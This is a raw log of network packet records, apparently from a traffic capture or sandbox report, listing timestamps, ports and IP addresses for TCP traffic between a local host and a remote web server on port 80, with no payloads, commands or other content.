Apr 25, 2024 12:16:11.040723085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040739059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040743113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040755033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040769100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040783882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040790081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040790081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040864944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040878057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040893078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040899992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040908098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040914059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040935040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040961981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040961981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.040971994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040986061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.040998936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041012049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041028023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041044950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041057110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041089058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041137934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041301966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041315079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041327953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041341066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041374922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041409969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041474104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041487932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041501045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041508913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041521072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041560888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041636944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041651011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041662931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041676998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041682005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041708946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041822910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041836977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041848898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041862011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041874886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041898012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041898012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041928053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.041986942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.041999102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042011976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042026043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042040110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042052031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042062044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042062044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042094946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042171001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042185068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042198896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042215109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042227983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042242050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042248964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042248964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042254925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042299032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042313099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042325020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042336941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042340040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042359114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042376041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042503119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042519093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042531013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042537928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042551994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042561054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042582035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042592049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042668104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042680979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042694092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042706966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042721033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042721987 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042733908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042747021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042768002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042812109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042825937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042829037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042840004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.042885065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.042885065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043015003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043029070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043040991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043052912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043066978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043078899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043092012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043097019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043097019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043103933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043117046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043117046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043129921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043148994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043231010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043265104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043277025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043289900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043323040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043442965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043457985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043469906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043482065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043499947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043520927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043628931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043641090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043653965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043665886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043694973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043694973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043695927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043710947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043723106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043737888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043756962 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043787956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043817043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043831110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043844938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.043889046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043889046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.043992043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044006109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044013977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044027090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044071913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044071913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044169903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044183969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044195890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044209003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044222116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044234037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044239998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044253111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044287920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044306040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044317961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044377089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044502974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044517040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044528961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044542074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044554949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044568062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044580936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044589996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044589996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044636965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044661999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044675112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044687986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044805050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044826031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044838905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044852018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044864893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044877052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044894934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.044897079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044922113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044939995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.044992924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045006037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045018911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045074940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045164108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045176029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045188904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045224905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045238018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045331955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045346022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045358896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045372009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045387030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045398951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045418024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045418024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045459032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045600891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045614004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045625925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045639992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045650959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045664072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045712948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045768976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045773983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045788050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045799971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045813084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045825958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045838118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045855045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045958996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045973063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045984983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.045994043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045994043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.045998096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046010971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046024084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046045065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046045065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046082973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046128988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046143055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046154976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046171904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046191931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046211004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046307087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046319962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046333075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046345949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046359062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046372890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046375990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046386957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046405077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046413898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046565056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046576977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046590090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046602964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046616077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046628952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046633959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046633959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046653986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046736956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046751022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046763897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046776056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046789885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046791077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046822071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046840906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046905994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046920061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046932936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046945095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046958923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.046972990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.046988964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047095060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047110081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047122002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047135115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047142029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047148943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047188044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047188044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047276974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047290087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047302008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047316074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047334909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047348976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047379017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047419071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047452927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047466993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047480106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047492981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047533989 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047533989 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047636986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047650099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047662973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047676086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047688961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047693968 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047707081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047719955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047733068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047744036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047744036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047746897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047780991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.047899008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047911882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047924995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047939062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.047967911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048067093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048079967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048091888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048111916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048125029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048163891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048163891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048163891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048228979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048242092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048254013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048266888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048280954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048299074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048347950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048415899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048429966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048441887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048455000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048466921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048496008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048496008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048518896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.048604012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048618078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.048629999 CEST	80	49733	176.97.76.106	192.168.2.4
